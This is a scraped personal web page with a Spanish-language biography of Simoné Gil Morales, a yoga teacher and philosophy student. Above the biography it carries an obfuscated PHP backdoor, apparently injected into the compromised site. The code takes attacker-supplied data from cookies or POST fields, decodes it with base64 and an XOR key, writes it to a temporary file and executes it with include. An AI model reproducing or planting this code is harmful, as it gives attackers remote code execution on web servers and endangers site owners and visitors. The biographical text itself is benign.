$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Simoné Gil Morales – www.interferencechannel.com

Simoné Gil Morales

No me gusta identificarme con lo que hago, de todas formas diré que este es el resultado de una necesidad por hacer básicamente lo que me gusta que en cierta medida expresa quien soy, más allá de los títulos académicos o reconocimientos sociales.

Vegana por principios y vegetariana estricta por instinto desde los 14 años, llevo una alimentación 80% cruda hace un año por la seguridad de que todo camino de autoconocimiento empieza con lo que ponemos en nuestro cuerpo.

Una certeza fundamental describe lo que soy: la certeza de ser posibilidades que se reajustan y cambian. Esto me conectó intensamente con la práctica del yoga que me enseñó, entre otras cosas, que somos todo y nada, que tenemos la capacidad de desconfigurarnos a nosotros mismos para alcanzar estados más elevados de conciencia a través del conocimiento del cuerpo. Desde siempre tuve una relación íntima con el lenguaje, no sólo corporal sino escrito, me gusta el sonido que producen las palabras combinadas de manera exquisita y jugosa, y me gusta jugar con esas combinaciones porque son la posibilidad de interpretar y recrear la realidad. Así es como se vincula el estudio de la filosofía, la literatura, la antropología con la práctica y enseñanza del yoga, además de otras técnicas de autoexploración que tienen que ver principalmente con el movimiento corporal (danza, deporte, circo).

Formalmente puedo decir que actualmente estoy terminando mis estudios de filosofía con opciones en literatura y antropología en la Universidad de los Andes. Paralelo a esto he estado estudiando por varios años la práctica milenaria del yoga, profundizando en varios estilos a saber: hatha, vinyasa, yoga inbound  y kundalini yoga, certificándome como profesora, sabiendo que la verdadera maestría se alcanza únicamente practicando y enseñando a partir de las propias realizaciones. Esto por la convicción y la necesidad de estimular en otros la capacidad de renovarse constantemente en ese campo infinito de posibilidades de ser y estar.

Me ha interesado también, por una motivación estética, la práctica de otras artes corporales como la danza contemporánea, el circo y otras técnicas de movimiento corporal. Entre mis proyectos a corto plazo se encuentran por un lado, empezar una formación en psicoterapia Gestalt para seguir el camino que hace varios años empecé de autoconocimiento. Y por otro lado, terminar la maestría en filosofía y empezar otra en antropología.♦

Comments are closed.